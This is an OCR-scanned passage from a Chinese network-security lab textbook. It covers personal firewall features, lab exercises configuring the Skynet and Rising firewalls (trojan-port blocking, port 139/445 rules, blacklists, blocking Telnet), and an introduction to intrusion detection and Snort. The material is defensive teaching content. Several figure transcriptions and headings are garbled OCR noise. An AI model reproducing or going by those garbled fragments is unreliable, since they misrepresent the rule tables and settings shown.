(4) 木马 防火 墙 。 通 过 多 种 技术 ,实现 对 木马 进程 的 查 杀 。 系 统 中 一 旦 有 木马 .黑客 或 
间谍 程序 访问 网 络 ,会 及 时 拦截 该 程序 对 外 的 通信 访问 ,然后 对 内 存 中 的 进程 进行 自动 查 
杀 , 以 保护 用 户 网 络 通信 的 安全 。 这 对 防御 资 取 用 户 信息 的 木马 `. 黑 客 程序 特别 有 效 。 具 体 
体现 在 以 下 3 个 方面 : 能 够 设置 应 用 程序 的 访问 权限 ; 四 通过 高 .中 、 低 3 种 安全 级 别 的 
设 定 ,达到 不 同 程度 地 保护 用 户 安全 的 目的 ; 加 能 够 阻止 如 冰河 `.B1O、 网 络 神偷 等 常见 木 
马 对 用 户 的 危害 ; 若 有 木马 侵入 ,金山 网 镖 会 及 时 拦截 ,并 弹出 对 话 框 告知 用 户 已 成 功 拦截 ， 

* 149 + 











真正 达到 实时 保护 计算 机 的 目的 。 

(5) 智能 防 黑 技术 。 融 杀毒 技术 与 网 络 防 火 墙 技术 于 一 体 ,直接 查 杀 流行 木马 与 黑客 
程序 。 动 态 监 视 计算 机 的 Internet 活动 状态 ,随时 加 以 控制 。 高 级 用 户 可 以 完全 细致 地 定 
制 不 同 的 IP 包 过 滤 规 则 。 

(6) 程序 应 用 规则 中 可 以 根据 自己 的 需要 设置 各 程序 访问 互联 网 和 局 域 网 的 权限 ,一 
般 来 说 ,很 多 程序 是 可 以 设置 成 禁止 访问 网 络 来 降低 受 攻击 的 可 能 性 。 


6.1.2.5 WEB KA 


瑞星 个 人 防火 墙 最 新 版 采用 增强 型 指纹 技术 ,能 有 效 地 监控 网 络 连接 。 内 置 细 化 的 规 
则 设置 ,使 网 络 保护 更 加 智能 。 游 戏 防盗 、 应 用 程序 保护 等 高 级 功能 为 个 人 计算 机 提供 全 面 
的 安全 保护 。 通 过 过 滤 不 安全 的 网 络 访问 服务 , 极 大 地 提高 了 用 户 计算 机 的 上 网 安全 。 彻 
底 阻挡 黑客 攻击 、 木 马 程序 等 网 络 危 险 , 保 护 上 网 账号 .QQ 密码 和 网 游 账号 等 信息 不 被 
窃取 。 

CD 防火 墙 多 账户 管理 。 防 火 墙 提供 “管理 员 ” 和 “普通 用户 ”两 种 账户 。 防 火 墙 提供 切 
换 账户 功能 ,可 以 在 两 种 账户 之 间 进 行 切换 。 管 理 员 可 以 执行 防火 墙 的 所 有 功能 ,普通 用 户 
不 能 修改 任何 设置 .规则 ,不 能 启动 /停止 防火 墙 ,不 能 退出 防火 墙 。 

(2) 未 知 木马 扫描 技术 。 通 过 启发 式 查 毒 技术 , 当 有 程序 进行 网 络 活动 的 时 候 ,对 该 进 
程 调用 未 知 木马 扫描 程序 进行 扫描 ,如 果 该 进程 为 可 疑 的 木马 病毒 , 则 提示 用 户 。 此 技术 提 
高 了 对 可 疑 程序 自动 识别 的 能 力 。 

G) TE 功能 调用 拦截 。 由 于 TE 提供 了 公开 的 COM 组 件 调 用 接口 ,有 可 能 被 恶意 程序 
所 调用 。 此 功能 是 对 需要 调用 IE 接口 的 程序 进行 检查 ,如 果 检 查 为 恶意 程序 , 则 向 用 户 
报警 。 

CD 反 钓鱼 , 防 木马 病毒 网 站 。 提 供 强大 的 、 可 以 升级 的 黑 名 单 规则 库 。 库 中 是 非法 
的 、 高 风险 、 高 危害 的 网 站 地 址 列表 ,符合 该 库 的 访问 会 被 禁止 。 

(5) 模块 检查 。 防 火 墙 能 够 控制 是 否 允 许 某 个 模块 访问 网 络 。 当 应 用 程序 访问 网 络 的 
时 候 ,对 参与 访问 的 模块 进行 检查 ,根据 模块 的 访问 规则 决定 是 否 允许 该 访问 。 以 往 的 防火 
墙 只 是 对 应 用 程序 进行 检查 ,而 没有 对 所 关联 的 DLL 做 检查 。 进 行 模块 检查 ,防止 了 木马 
模块 注入 正常 进程 中 访问 网 络 。 


6.2 天 网 防火 墙 实验 





实验 器 材 

天 网 防火 墙 个 人 版 软件 系统 ,1 套 。 
PC(Windows XP/Windows 7).1 台 。 
预习 要 求 


(1) 做 好 实验 预习 ,复习 防火 墙 技术 的 有 关内 容 。 
(2) 熟悉 天 网 防火 墙 的 使 用 方法 。 
* 150 。 


(3) 熟悉 实验 过 程 和 基本 操作 流程 。 
(4) 做 好 预习 报告 。 


通过 本 实验 ,掌握 以 下 技能 : 
(1) 学 会 天 网 防火 墙 的 安装 及 基本 配置 。 
(2) 学 会 利用 天 网 防火 墙 保护 系统 安全 。 


装 有 Windows XP/Windows 7 操作 系统 的 PC. 

预备 知识 

(1) 防火 墙 技术 及 原理 。 

(2) 网 络 协 议 。 

KRP 

l. 系统 设置 

系统 设置 如 图 6.2. 1 所 示 , 包 括 启 动 .规则 设 定 .应 用 程序 权限 .局域网 地 址 设 定 和 其 他 
设置 几 个 方面 。 




















基本 设置 | 管理 权限 设置 | rammer) 日 志 管 理 | CAI 


启动 规则 设 定 
Iv 开机 后 自动 启动 防火 墙 
应 用 程序 权限 

T- 允许 所 有 的 应 用 程序 访问 网 络 , 并 在 规则 中 记录 这 些 程序 

局 域 网 地 址 设 定 

局 域 网 地 址 [10 246 21 .29 
其 他 设置 


v deem E PogemFiesshNelFiey pmo) 国 ] 


图 621 天 网 防火 墙 设置 界面 








启动 项 是 设 定 开机 后 自动 启动 防火 墙 。 默 认为 不 启动 ,一般 选择 自动 启动 。 这 也 是 安 
装 防火 墙 的 目的 。 规 则 设 定 是 一 个 设置 向 导 , 可 以 分 别 设置 安全 级 别 、 局 域 网 信息 和 常用 应 
用 程序 。 局 域 网 地 址 设 定 和 其 他 设置 可 以 根据 网 络 环境 和 爱好 自由 设置 。 
>= ISl + 


2. 安全 级 别 设置 
最 新 版 的 天 网 防火 墙 的 安全 级 别 分 为 低 、 中 、 高 、 自 定义 4 类。 把 鼠标 置 于 某 个 级 别 上 
时 ,可 从 注释 对 话 框 中 查看 详细 说 明 , 如 图 6.2.2 Bron. 


RAKES TAR 


DU XT 天 





图 622 安全 级 别 设置 界面 


。 低 安全 级 别 情况 下 ,完全 信任 局 域 网 ,允许 局 域 网 中 的 计算 机 访问 本 计算 机 提供 的 
各 种 服务 ,但 禁止 互联 网 上 的 计算 机 访问 这 些 服务 。 
。 中 安全 级 别 下 ,局 域 网 中 的 计算 机 只 可 以 访问 共享 服务 ,但 不 允许 访问 其 他 服务 ,也 
不 允许 互联 网 中 的 计算 机 访问 这 些 服务 ,同时 运行 动态 规则 管理 。 
。 高 安全 级 别 下 系统 屏蔽 所 有 向 外 的 端口 ,局 域 网 和 互联 网 中 的 计算 机 都 不 能 访问 本 
计算 机 提供 的 网 络 共享 服务 ,网 络 中 的 任何 计算 机 都 不 能 查找 到 本 计算 机 的 存在 。 
。 自 定义 级 别 适合 了 解 TCP/IP 协议 的 用 户 ,可 以 设置 IP 规则 ,而 如 果 规 则 设置 不 正 
确 , 可 能 会 导致 不 能 访问 网 络 。 
对 普通 个 人 用 户 ,一 般 推荐 将 安全 级 别 设置 为 中 级 。 
3. 应 用 程序 访问 网 络 权限 设置 
在 设置 的 高 级 选项 中 ,可 以 设置 该 应 用 程序 是 通过 TCP 还 是 UDP 协议 访问 网 络 ,以 及 
TCP 协议 可 以 访问 的 端口 ,如 图 6. 2. 3 所 示 。 当 不 符合 条 件 时 ,程序 将 询问 用 户 或 禁止 操作 。 
4. BEM IP 规则 设置 
在 选中 中 级 安全 级 别 时 ,进行 自 定义 IP 规则 的 设置 是 很 必要 的 。 在 这 一 项 设置 中 ,可 
以 自行 添加 、 编 辑 和 删除 TP. 规则 ,对 防御 入 侵 可 以 起 到 很 好 的 作用 ,如 图 6.2.4 所 示 。 


动作 | 名 称 协议 | 方向 | 对 方 IP 
(9 “允许 自己 用 ping 命 令 探 测 其 他 机 器 ICIP à EA 















































应 用 程序 访问 网 络 权限 设置 DO W D 3 Ca) O “允许 路 由 器 返回 "超时 "的 ICIP 回 应 tICIP (à 任何 
[p PFWLiveUpdate EXE 版 本 :2.7.51 Y pex) ^ O ”允许 路 由 器 返回 "无 法 到 达 “ 的 ICHWPEICMP EAT 
i ne: 1C Progr ? OO [ree Apina Siem [iow à “局域网 
L E Fies SKINE FteWaNPFWLivelJodaie EXE 5 m) T © “防止 别人 用 ping 命 令 探测 Tw à EA 
QQ 版 本 : 05. 0. 103 Y Gam) M O 防御 ICIP 攻 击 Tor oh 任何 
网 和 M © “防御 IGIP 攻击 Tow 而“ 任何 
= LEE) Do e 数据 包 监 视 TCP | | 任何 
[5], [Services and Controller app 版 本 : 51.2600.2 w^ (ex) O 四 | 区 许 局 域 网 内 的 机 器 进行 连 模 和 和 传唱 TCP (à ”| 局 域 网 
Um [it E: ineo nico im T BO AFRRMHNERARNHEARICP A SMM 
5 UNE) cd @ 禁止 互联 网 上 的 机 器 使 用 我 的 共享 党 TCP “而 任何 * 
fe |e ee frisvoner DEF) STP S HEAR 器 时 ， 如 果 那 台 机 器 安装 了 TCP7IP 协 议 
DES eee es & m) ZUR ee Bru AHR ake 
[二 TDUpdate exe 版 本 : (无 } 2 Ww) PN 
Ñ | 路径 :C:\Program Files\Thunder X EET 
Network^ThunderMinA TD Update. exe Bs 
图 623 应 用 程序 网 络 访问 权限 设置 图 624 IP 访 问 规则 设置 


对 于 对 TP 规则 不 甚 精通 ,并 且 也 不 想 去 了 解 这 方面 内 容 的 用 户 , 可 以 通过 下 载 天 网 或 
其 他 网 友 提 供 的 安全 规则 库 ,将 其 导入 到 程序 中 ,也 可 以 起 到 一 定 的 防御 木马 程序 .抵御 人 
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侵 的 作用 。 其 缺点 是 ,对 于 最 新 的 木马 和 攻击 方法 ,需要 重新 进行 规则 库 的 下 载 。 

IP 规则 的 设置 分 为 以 下 几 方 面 : 规则 名 称 的 设 定 , 规 则 的 说 明 ,. 数 据 包 方向 ,对 方 IP 地 
址 ,对 于 该 规则 JP.TCP、.UDP ICMP IGMP 协议 需要 做 出 的 设置 , 当 满足 上 述 条 件 时 对 数 
据 包 的 处 理 方式 ,对 数据 包 是 否 进行 记录 等 。 如 果 IP 规则 设置 不 当 , 天 网 防火 墙 的 警告 标 
志 就 会 不 停 内 烁 ;而 如 果 正 确 地 设置 了 IP 规则 , 则 既 可 以 起 到 保护 计算 机 安全 的 作用 ,又 可 
以 不 必 时 时 去 关注 警告 信息 。 

在 天 网 防火 墙 的 默认 设置 中 有 对 于 ICMP 和 IGMP. 攻击 的 防御 ,这 两 种 攻击 形式 一 般 
情况 下 只 对 Windows 98 系统 起 作用 ,而 对 Windows 2000 和 Windows XP 的 用 户 攻 击 无 
效 , 因 此 可 以 允许 这 两 种 数据 包 通 过 ,或 者 拦截 而 不 警告 。 

] Ping 命令 探测 计算 机 是 否 在 线 是 黑客 经 常 使 用 的 方式 ,因此 要 防止 别人 用 Ping 

















探测 。 

在 国内 IP 地 址 缺乏 的 情况 下 ,很 多 用 户 是 在 一 个 局 域 网 内 上 网 ,而 在 同一 个 局 域 网 内 
可 能 存在 很 多 想 一 试 身手 的 黑客 。 

139 端口 是 经 常 被 黑客 利用 Windows 系统 的 IPC 漏洞 进行 攻击 的 端口 ,用 户 可 以 对 通 
过 这 个 端口 传输 的 数据 进行 监听 或 拦截 ,规则 是 : 名 称 可 定 为 139 端口 监听 ,外 来 地 址 设 
为 任何 地 址 ,在 TCP 协议 的 本 地 端口 可 填写 从 139 到 139 ,通行 方式 可 以 是 通行 并 记录 ， 
也 可 以 是 拦截 ,这 样 就 可 以 对 这 个 端口 的 TCP 数据 进行 操作 。445 端口 的 数据 操作 与 此 
类 似 。 

如 果 用 户 知 道 某 个 木马 或 病毒 的 工作 端口 ,就 可 以 通过 设置 IP 规则 封闭 这 个 端口 。 方 
法 是 : 增加 IP 规则 ,在 TCP 或 UDP 协议 中 ,将 本 地 端口 设 为 从 该 端口 到 该 端口 ,对 符合 该 
规则 的 数据 进行 拦截 ,就 可 以 起 到 防范 该 木马 的 效果 。 

增加 木马 工作 端口 的 数据 拦截 规则 ,是 IP 规则 设置 中 最 重要 的 一 项 技术 。 


实验 报告 要 求 


+ 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 遇 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 


6.3 瑞星 防火 墙 实验 


实验 器 材 

瑞星 防火 墙 个 人 版 软件 系统 ,1 套 。 
PC(Windows XP/Windows 7).1 @. 
预习 要 求 


(1) 做 好 实验 预习 ,复习 防火 墙 技术 的 有 关内 容 。 
(2) 熟悉 瑞星 防火 墙 的 使 用 方法 。 
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(3) 熟悉 实验 过 程 和 基本 操作 流程 。 
(4) 做 好 预习 报告 。 


实验 任务 


通过 本 实验 ,掌握 以 下 技能 : 
COD 学 会 瑞星 防火 墙 的 安装 及 基本 配置 。 
(2) 学 会 利用 瑞星 防火 墙 保护 系统 安全 。 


实验 环境 

装 有 Windows XP/Windows 7 操作 系统 的 PC. 
预备 知识 

(1) 防火 墙 技术 及 原理 。 

(2) 网 络 协议 。 

实验 步 又 


LS 
l. 启动 瑞星 个 人 防火 墙 软件 
采用 下 列 方法 之 一 可 以 启动 瑞星 个 人 防火 墙 软件 ,启动 后 的 界面 如 图 6. 3. 1 所 示 。 





系统 状态 
penes 访问 规则 中 没有 规定 动作 的 程序 在 访问 网 络 时 ， 会 提示 用 户 。 








受 玫 击 信息 
系统 启动 以 来 ， 还 没有 发 现 对 系统 的 攻击 。 





pum i 更 区 信息 | 
当前 活动 程序 O00007 g 
PROGR 修 的 系统 目前 存在 8 个 不 安全 设置 
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图 631 瑞星 个 人 防火 墙 软件 主 界面 


(1) 双击 桌面 上 的 “瑞星 个 人 防火 墙 ”快捷 图 标 即 可 启动 。 
(2) 单 击 “ 开 始 ” 按 钮 ,选择 “程序 ”>“ 瑞 星 个 人 防火 墙 " 一 “瑞星 个 人 防火 墙 ” 即 可 启动 。 
提示 : 一 般 情况 下 ,瑞星 个 人 防火 墙 在 系统 启动 时 将 自动 启动 。 
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2. 设置 安全 级 别 

在 防火 墙 程序 主 界面 的 右 下 角 , 拖 动 滑 块 移动 到 最 右 侧 ,. 即 可 设 定安 全 级 别 为 “高 级 ”。 

提示 : 关于 安全 级 别 的 定义 及 规则 如 下 。 

。 普通 : 系统 在 信任 的 网 络 中 ,除非 规则 禁止 的 ,否则 全 部 放 过 。 

。 中 级 : 系统 在 局 域 网 中 ,默认 允许 共享 ,但 是 禁止 一 些 较 危险 的 端口 。 

。 高 级 : 系统 直接 连接 Internet, 除 非 规 则 放行 ,否则 全 部 拦截 。 

3. 扫描 木马 病毒 

在 防火 墙 程序 主 界面 菜单 栏 中 选择 “操作 ”一 “扫描 木马 病毒 "命令 。 将 在 屏幕 右 下 角 弹 
出 扫描 窗口 ,扫描 结束 后 将 给 出 提示 , 单 击 提示 框 中 的 “详细 信息 ”按钮 可 以 查看 具体 的 扫描 
结果 日 志 。 

4. 黑 、 白 名 单 的 设置 

1) 黑 名 单 的 设置 

黑 名 单 用 于 设置 禁止 与 本 机 通信 的 计算 机 列表 ,例如 ,可 以 把 攻击 本 机 的 计算 机 加 入 此 
名 单 。 选 择 菜单 “设置 "一 “详细 设置 "命令 ,打开 
“详细 设置 ”对 话 框 ; 单 击 “ 规 则 设置 ”下 的 “ 黑 名 
单 ”; 单 击 “ 增 加 规则 ”按钮 ,弹出 如 图 6. 3. 2 所 示 的 
“增加 黑 名 单 ” 对 话 框 。 在 “地 址 类 型 ”下拉 式 列表 
框 中 选择 “特定 地 址 ”或 地址 范围 ”; 在 “输入 地 址 ” 
文本 框 中 输入 被 禁止 与 本 机 通讯 的 IP 地 址 。 单 击 
“保存 ?按钮 , 即 可 完成 设置 。 

2) 白 名 单 的 设置 

白 名 单 用 于 设置 完全 信任 的 计算 机 列表 ,列表 
中 的 计算 机 对 本 机 有 完全 访问 权限 。 具 体操 作 参 
见 黑 名 单 的 设置 。 

5. 修改 应 用 程序 访问 网 络 的 访问 规则 

CD 选择 菜单 “设置 ">“ 详 细 设 置 ”命令 ,打开 “详细 设置 ”对 话 框 。 

(2) 选择 “规则 设置 "下 的 “访问 规则 ”命令 ,打开 如 图 6. 3. 3 所 示 的 对 话 框 。 

(3) 允许 或 禁止 应 用 程序 访问 网 络 。 

在 程序 列表 框 中 选择 一 个 应 用 程序 ,如 Telnet; 单 击 “ 编 辑 规则 ”按钮 ,弹出 如 图 6. 3. 4 
所 示 的 “编辑 访问 规则 ”对 话 框 ,在 “常规 模式 ”下 选择 “禁止 ”, 单 击 “ 保 存 ” 按 钮 , 即 可 禁止 
Telnet 程序 访问 网 络 。 


实验 报告 要 求 

。 实 验 目 的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 遇 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 


增加 黑 名 单 





图 632 Hn EG" 
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图 633 FMRE" 对 话 框 
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图 634 ”编辑 访问 规则 ”对 话 框 


6.4 防火 墙 评测 实验 


实验 器 材 


天 网 防火 墙 软件 系统 ,1 套 。 
瑞星 防火 墙 软件 系统 ,1 套 。 
江 民 防火 墙 软件 系统 ,1 套 。 
PC(Windows XP/Windows 7).1 台 。 
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预习 要 求 


CD 做 好 实验 预习 ,复习 防火 墙 技术 的 有 关内 容 。 
(2) 熟悉 天 网 防火 墙 等 多 种 防火 墙 的 使 用 方法 。 
(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 

实验 任务 


通过 本 实验 ,掌握 以 下 技能 : 
(1) 掌握 主流 防火 墙 的 性 能 。 
(2) 掌握 主流 防火 墙 的 功能 。 


实验 环境 

装 有 Windows XP/Windows 7 操作 系统 的 PC. 
预备 知识 

防火 墙 技术 及 原理 。 

实验 步 又 


(1) 完整 记录 天 网 防火 墙 和 瑞星 防火 墙 控制 的 实验 内 容 。 

(2) 从 6.1.2 节 中 选择 第 三 种 防火 墙 或 者 自行 确定 另外 一 种 类 型 的 软件 防火 墙 进 行 控 
制 实验 。 

(3) 确定 防火 墙 的 性 能 功能、 特定 功能 3 个 方面 作为 评测 分 析 报 告 的 主体 。 

CA) 撰写 并 完成 评测 分 析 报 告 。 

实验 报告 要 求 

。 实 验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 

。 阐述 遇 到 的 问题 以 及 解决 方法 。 

。 阐述 收获 与 体会 。 
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第 7 童 入 侵 检测 实验 


随 着 技术 的 发 展 , 网 络 日 趋 复杂 , 正 是 由 于 传统 防火 墙 所 暴露 出 来 的 不 足 和 弱点 , 才 引 
发 了 人 们 对 入 侵 检测 系统 技术 的 研究 和 开发 。 网 络 人 侵 检 测 系统 可 以 弥补 防火 墙 的 不 足 ， 
为 网 络 安全 提供 实时 的 入 侵 检测 及 采取 相应 的 防护 手段 。 入 侵 检测 技术 是 近 20 年 来 出 现 
的 一 种 主动 保护 自己 免 受 黑客 攻击 的 新 型 网 络 安全 技术 。 从 系统 运行 过 程 中 产生 的 或 系统 
所 处 理 的 各 种 数据 中 查找 出 威胁 系统 安全 的 因素 ,并 对 威胁 做 出 相应 的 处 理 ,就 称 为 人 侵 检 
测 。 响 应 的 软件 或 硬件 称 为 人 侵 检测 系统 。 入 侵 检 测 系统 被 称 为 防火 墙 之 后 的 第 二 道 防 
线 , 它 在 不 影响 网 络 性 能 的 情况 下 对 网 络 进行 检测 ,提供 对 内 部 攻击 和 外 部 攻击 的 实时 
防范 。 


7.1 入 侵 检 测 原 理 


7.1.1 入 侵 检 测 步 又 


入 侵 检测 一 般 分 为 两 个 步骤 ; 信息 收集 和 数据 分 析 。 

入 侵 检 测 的 第 一 步 是 信息 收集 ,内 容 包 括 系统 网络、 数据 及 用 户 活动 的 状态 和 行为 。 
入 侵 检 测 利用 的 信息 一 般 来 自 以 下 4 个 方面 : 系统 日 志 、 目 录 以 及 文件 中 的 异常 改变 ,程序 
执行 中 的 异常 行为 和 物理 形式 的 人 侵 信 息 。 

CD 系统 日 志 。 利 用 系统 日 志 是 检测 人 侵 的 必要 条 件 。 日 志文 件 中 记录 了 各 种 类 型 的 
行为 ,每 种 类 型 又 包含 不 同 的 信息 ,对 用 户 活 动 来 讲 ,不 正常 的 或 不 期 望 的 行为 是 重复 登录 
失败 以 及 非 授权 访问 重要 文件 等 。 

(2) 目录 以 及 文件 异常 。 网 络 环境 中 的 文件 系统 包含 很 多 软件 和 数据 文件 ,包含 重要 
信息 的 文件 和 私有 数据 文件 经 常 是 被 修改 或 破坏 的 目标 。 

(3) 程序 执行 异常 。 网 络 系统 上 的 程序 执行 一 般 包 括 操作 系统 、 网 络 服务 、 用 户 启动 的 
程序 和 应 用 。 每 个 在 系统 上 执行 的 程序 由 一 到 多 个 进程 来 实现 。 每 个 进程 执行 在 具有 不 同 
权限 的 环境 中 ,这 种 环境 控制 着 进程 可 访问 的 系统 资源 ,程序 和 数据 文件 等 。 

CA) 物理 形式 的 人 侵 信息 。 分 为 两 种 情况 ,一 是 未 授权 的 网 络 硬 件 连接 ,二 是 物理 资源 
的 未 授权 访问 。 


7.1.2 检测 技术 特点 


在 使 用 入 侵 检 测 技术 时 ,应 该 注意 ,具有 以 下 技术 特点 的 应 用 要 根据 具体 情况 进行 
选择 : 
CD 信息 收集 分 析 时 间 : 可 分 为 固定 时 间 间 隔 和 实时 收集 分 析 两 种 。 
采用 固定 时 间 间 隔 方法 ,在 固定 间隔 的 时 间 段 内 收集 和 分 析 这 些 信 息 , 这 种 技术 适用 于 
对 安全 性 能 要 求 较 低 的 系统 ,对 系统 的 开销 影响 较 小 ;但 这 种 技术 的 缺点 是 在 时 间 间 隔 内 将 
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失去 对 网 络 的 保护 。 

采用 实时 收集 和 分 析 技 术 可 以 实时 地 抑制 攻击 ,使 系统 管理 员 及 时 了 解 并 阻止 攻击 , 系 
统管 理 员 也 可 以 记录 黑客 的 信息 ;缺点 是 加 大 了 系统 开销 。 

(2) 采用 的 分 析 类 型 : 分 为 签名 分 析 、 统 计 分 析 和 完整 性 分 析 。 

签名 分 析 就 是 与 攻击 数据 库 中 的 系统 设置 和 用 户 行为 模式 进行 匹配 。 在 许多 入 侵 检测 
系统 中 建 有 这 种 已 知 攻击 的 数据 库 。 这 种 数据 库 可 以 经 常 更 新 ,以 对 付 新 的 威胁 。 签 名 分 
析 的 优点 在 于 能 够 有 针对 性 地 收集 系统 数据 ,减少 了 系统 的 开销 ,如 果 数 据 库 不 是 特别 大 ， 
那么 签名 分 析 比 统计 分 析 更 为 有 效 。 

统计 分 析 用 来 发 现 偏离 正常 模式 的 行为 ,通过 分 析 正 常 应 用 的 属性 得 到 系统 的 统计 特 
征 ,对 每 种 正常 模式 计算 出 均值 和 偏差 , 当 检测 到 有 的 数值 偏离 正常 值 时 ,就 会 发 出 报警 信 
号 。 这 种 技术 可 以 发 现 未 知 的 攻击 ,尤其 是 复杂 的 攻击 ,但 统计 传感器 误 码 率 较 大 。 

完整 性 分 析 主 要 关注 某 些 文件 和 对 象 的 属性 是 否 发 生 了 变化 。 完 整 性 分 析 通 过 被 称 为 
消息 摘录 算法 的 超 强 加 密 机 制 , 可 以 感受 到 微小 的 变化 。 这 种 分 析 可 以 检测 到 任何 使 文件 
发 生变 化 的 攻击 ,弥补 了 签名 分 析 和 统计 分 析 的 缺陷 ,但 是 这 种 分 析 的 实时 性 很 差 。 

(3) 对 攻击 和 误 用 的 反应 : 有 些 基 于 网 络 的 检测 系统 可 以 针对 检测 到 的 问题 作出 反 
应 。 这 些 反 应 主要 有 改变 环境 、 效 用 检验 和 实时 通知 等 。 改 变 环境 通常 包括 关闭 连接 和 重 
新 设置 系统 。 由 于 改变 了 系统 的 环境 ,因此 ,可 以 通过 设置 代理 和 审计 机 制 获得 更 多 的 信 
息 ,从 而 跟踪 黑客 。 许 多 实时 系统 还 允许 管理 员 选 择 一 种 预警 机 制 ,把 发 生 的 问题 实时 地 送 
往 各 个 地 方 。 

CA) 管理 和 安装 : 用 户 采 用 检测 系统 时 ,需要 根据 本 网 的 一 些 具体 情况 而 定 。 实 际 上 ， 
没有 两 种 完全 相同 的 网 络 环境 ,因此 ,就 必须 对 采用 的 系统 进行 配置 。 比 如 ,可 以 配置 系统 
的 网 络 地 址 、 安 全 条 目 等 。 某 些 基于 主机 的 检测 系统 还 提供 友好 的 用 户 界面 ,让 用 户 说 明 要 
传感器 采集 哪些 信息 。 


7.1.3 Snort 简介 


Snort 是 Martin Roesch 等 人 开发 的 一 种 用 C 语言 编写 的 开放 源码 的 入 侵 检 测 系统 。 
Martin Roesch 把 Snort 定位 为 一 个 轻 量 级 的 、 跨 平台 、 支 持 多 操作 系统 的 人 侵 检 测 系统 。 
它 具 有 实时 数据 流量 分 析 和 IP 数据 包 日 志 分 析 的 能 力 , 具 有 路 平台 特征 ,能 够 进行 协议 分 
析 和 对 内 容 的 搜索 /匹配 。 它 能 够 检测 不 同 的 攻击 行为 ,如 缓冲 区 溢出 、 端 口 扫描 ,DoS 攻击 
等 ,并 进行 实时 报警 。Snort 可 安装 在 网 络 上 的 一 台 主 机 上 对 整个 网 络 进行 监视 。 

Snort 由 3 个 子 系统 构成 : 数据 包 解码 器 .检测 引擎 .日 志 与 报警 系统 。 在 使 用 Snort 
之 前 ,需要 根据 网 络 环境 和 安全 策略 对 Snort 进行 配置 ,主要 包括 : 设置 网 络 变量 ,配置 预 
ARFER (preprocessors) ,配置 输出 插件 ,配置 所 使 用 的 规则 集 。 在 入 侵 检 测 过 程 中 采用 了 规 
则 匹配 的 检测 方法 ,所 以 误 码 报 率 较 低 。 

Snort 有 3 种 工作 模式 : 嗅 探 器 、 数 据 包 记 录 器 和 网 络 入 侵 检 测 系 统 。 嗅 探 器 模式 仅仅 
是 从 网 络 上 读 取 数据 包 并 作为 连续 不 断 地 流 显示 在 终端 上 。 数 据 包 记录 器 模式 把 数据 包 记 
录 到 硬盘 上 。 网 络 人 侵 检测 模式 是 最 复杂 的 ,而 且 是 可 配置 的 。 可 以 让 Snort 分 析 网 络 数 
据 流 以 匹配 用 户 定 义 的 一 些 规则 ,并 根据 检测 结果 采取 一 定 的 动作 。 
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7.1.3.1 功能 特征 


虽然 Snort 是 一 个 轻 量 级 的 入 侵 检测 系统 ,但 是 它 的 功能 却 非常 强大 ,其 特点 如 下 。 

1. Batt 

Snort 可 以 支持 Linux, Solaris, UNIX 和 Windows 系列 等 平台 ,而 大 多 数 商 用 入 侵 检 
测 软件 只 能 支持 一 两 种 操作 系统 ,甚至 需要 特定 的 操作 系统 。 

2. 功能 完备 

Snort 具有 实时 流量 分 析 的 能 力 ,能 够 快速 地 监测 网 络 攻击 ,并 能 及 时 地 发 出 警报 。 使 
用 协议 分 析 和 内 容 匹 配 的 方式 ,提供 了 对 TCP UDP, ICMP 等 协议 的 支持 ,对 缓冲 区 溢出 、 
隐蔽 端口 扫描 、CGI 扫描 ,SMB 探测 和 操作 系统 指纹 特征 扫描 等 攻击 都 可 以 检测 。 

3. 使 用 插件 的 形式 

Snort 方便 管理 员 根 据 需 要 调用 各 种 插件 模块 ,包括 输入 插件 和 输出 插件 。 输 入 插件 
主要 负责 对 各 种 数据 包 的 处 理 , 具 备 传输 层 连接 恢复 .应 用 层 数 据 提取 、 基 于 统计 的 数据 包 
异常 检测 的 功能 ,从 而 拥有 很 强 的 系统 防护 功能 ,如 使 用 TCP 流 插 件 ,可 以 对 TCP 包 进 行 
重组 。 

输出 插件 则 主要 用 来 将 检测 到 的 报警 以 多 种 方式 输出 ,通过 输出 插件 可 以 输出 
MySQL, SQL 等 数据 库 中 ,还 可 以 以 XML 格式 输出 ,也 可 以 把 网 络 数据 保存 到 TCPDump 
格式 的 文件 中 。 按 照 其 输出 插件 规范 ,用 户 甚至 可 以 自己 编写 插件 ,自己 来 处 理 报 警 的 方式 
并 进而 作出 响应 ,从 而 使 Snort 具有 非常 好 的 可 扩展 性 和 灵活 性 。 

4. Snort 规则 描述 简单 

Snort 基于 规则 的 检测 机 制 十 分 简单 和 灵活 ,使 得 可 以 迅速 对 新 的 入 侵 行为 做 出 反应 ， 
发 现 网 络 中 潜在 的 安全 漏洞 。 同 时 ,该 网 站 提供 几乎 与 http://www. cert. org( 应 急 响 应 中 
心 , 负 责 全球 的 网 络 安全 事件 以 及 漏洞 的 发 布 ) 同 步 的 规则 库 更 新 ,因此 ,甚至 许多 商业 的 人 
侵 检 测 软件 直接 就 使 用 Snort 的 规则 库 。 图 7. 1. 1 显示 了 Snort 的 系统 组 成 和 数据 处 理 
流程 。 
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图 711 Short 程序 流程 图 
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1) 数据 包 捕 获 库 

基于 网 络 的 入侵 检测 系统 需要 捕获 并 分 析 所 有 传输 到 监控 网 卡 的 网 络 数据 ,这 就 需要 
包 捕 获 技术 。Snort 通过 两 种 机 制 来 实现 包 捕 获 , 其 一 是 将 网 卡 设置 为 混杂 模式 ,其 二 是 利 
用 Libpcap/Winpcap 函数 库 从 网 卡 捕 获 网 络 数 据 包 。 

数据 包 捕 获 函数 库 是 一 个 独立 的 软件 工具 ,能 直接 从 网 卡 获取 数据 包 。 该 函数 库 是 由 
Berkeley 大 学 Lawrence Berkeley National Laboratory 人 研究 院 开发 ,Libpcap 支持 所 有 基于 
可 移植 操作 系统 接口 (Portable Operating System Interface of UNIX. POSIX) 的 操作 系统 ， 
如 Linux, UNIX 等 ,后 来 为 支持 跨 平台 特性 , 又 开发 了 Windows 版 本 (http://www. 
winpcap. org). Windows 下 和 Linux 的 函数 调用 几乎 完全 相同 ,Snort 就 是 通过 调用 该 库 函 
数 从 网 络 设备 上 捕获 数据 包 。 

2) 数据 包 解码 器 

数据 包 解 码 器 主要 是 对 各 种 协议 栈 上 的 数据 包 进 行 解析 、 预 处 理 , 以 便 提交 给 检测 引擎 
